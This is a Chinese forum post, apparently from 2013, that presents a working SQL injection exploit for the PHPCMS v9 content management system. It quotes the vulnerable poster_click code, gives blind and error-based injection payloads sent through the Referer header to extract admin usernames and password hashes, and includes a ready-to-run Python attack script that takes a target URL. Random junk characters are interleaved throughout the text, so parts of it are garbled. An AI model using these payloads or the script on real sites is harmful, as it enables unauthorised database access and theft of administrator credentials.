有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
2 N6 N9 F( Q+ A, j& c7 I4 n6 q/ A) z2 H
问题函数\phpcms\modules\poster\index.php+ n: ? O U0 v9 Z, B6 N0 X0 q
$ @$ G3 b. y( o* i. Epublic function poster_click() {$ z# u7 x7 w* y
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;6 R5 l6 W$ ]' E4 x) I3 L
$r = $this->db->get_one(array('id'=>$id));5 `( x$ B; s6 `+ O( m( ~) ]: }
if (!is_array($r) && empty($r)) return false;
. W: m* D' [# B t) H( k& @$ip_area = pc_base::load_sys_class('ip_area'); U2 ^. L- G1 F N. e
$ip = ip();; v. l) M f* S' B# v. Y- b+ L
$area = $ip_area->get($ip);
/ l1 F- ]3 }/ }! Z3 ]. q. ?5 D$username = param::get_cookie('username') ? param::get_cookie('username') : '';
! C: d; l, ~; f% mif($id) {
5 @# s2 `/ K0 V% p" U$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
. @3 ?% [3 Z) s3 h% w! ?$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
4 d$ S) X' [% [ v}4 q7 Z4 b/ P/ N$ A: C) p9 H
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
f. E, R7 B2 q5 j' P2 l$setting = string2array($r['setting']);
@1 u# O! C# ^& y2 E! L3 s9 Xif (count($setting)==1) {
6 Z" Q9 T4 y8 R' _; \4 R$url = $setting['1']['linkurl'];
/ G6 n$ I4 W4 X: ]" u( ~- u} else {/ M$ ~% U7 K7 ]: y7 J
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];8 G: c R; ^; e) {
}
) U6 O# W2 p& r# D8 cheader('Location: '.$url);
! e) f' i7 U) P}+ S6 v5 h0 p8 P9 W
- ?; F- k8 B0 }& t% r . d# M5 V) Y2 M& S
7 z: c' X9 D0 b; Y6 }( B( x E% R P
利用方式:6 ` t. Q+ L+ C0 J
. l* K2 v. D' J- S" [1 Z4 K1、可以采用盲注入的手法:
' p& F g4 r+ M' @
0 v* \4 I: i) Preferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
: n' _ g2 [( a5 a a' }. W( j. b ]2 B7 {4 I$ D
通过返回页面,正常与否一个个猜解密码字段。, z3 E/ p9 v( u6 W9 r* B6 B
5 N1 O2 u! D$ @+ Y$ T: u* ?2、代码是花开写的,随手附上了:) {. m; Y' X+ _4 d0 p' Y: X
& W6 S2 H4 K5 H! ]
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
1 q# `- O9 O6 r3 t5 }9 z
# y5 x" u, X8 D' u: P9 t$ \3 ] O0 h此方法是爆错注入手法,原理自查。
7 o) G5 s3 q9 W7 f1 N# q p7 v* Y, b
( J. r! [& S- r5 z, [& _
# y- @4 K) N: v( Z& c1 ?* v# E; j5 @9 F
利用程序:% j# V' @; B3 z
( y$ T# }% t. a( J
#!/usr/bin/env python
+ _3 J$ u! f4 m% L3 l- i4 f- U7 Himport httplib,sys,re
6 J# l3 _! s' r! a9 N
/ H( l- G: p2 a& R$ F$ Edef attack():# I3 \) R, }" Z k: @ t+ c
print “Code by Pax.Mac Team conqu3r!”6 _9 m/ y G7 h5 o) t
print “Welcome to our zone!!!”, V O$ E% X+ v
url=sys.argv[1]) P2 \+ n l' B1 e/ l7 Q
paths=sys.argv[2]+ l1 i1 K4 T" F$ {
conn = httplib.HTTPConnection(url)7 M. g( |) U5 v( M+ W
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
3 P c4 B* k. ?8 \“Accept”: “text/plain”,
! u# K6 }8 G6 B; t/ }5 f“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
# A8 b; \' ?& Gconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)/ ]6 N: z; O0 A; _+ [! C1 Q) Z' u W
r1 = conn.getresponse()" ^- N1 B& @+ m7 K) J' J1 z
datas=r1.read()- h* f( z0 D- g
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
; `1 j: b4 } oprint datas[0]
- r6 [. A( w& c4 y, d: u% Rconn.close()& K% U9 H+ r+ R' t0 _4 B
if __name__==”__main__”:* ]" p( c0 r5 e) r# d+ h# @
if len(sys.argv)<3:: V. P0 A2 W& M2 r# M
print “Code by Pax.Mac Team conqu3r”8 C+ P) _% f) N5 T$ a
print “Usgae:”
, t7 H4 G4 E3 `5 _1 Pprint “ phpcmsattack.py www.paxmac.org /”+ \' r9 v% F* S8 L
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”1 U1 T c, q! U+ ?: x" {
sys.exit(1)
) G/ `1 y+ p9 {9 O* H! tattack()
" E# V3 B7 _, R4 n1 X) K
0 O: ?8 h2 J0 H) `) Q |
发表于 2013-1-11 21:01:00
收藏
支持
反对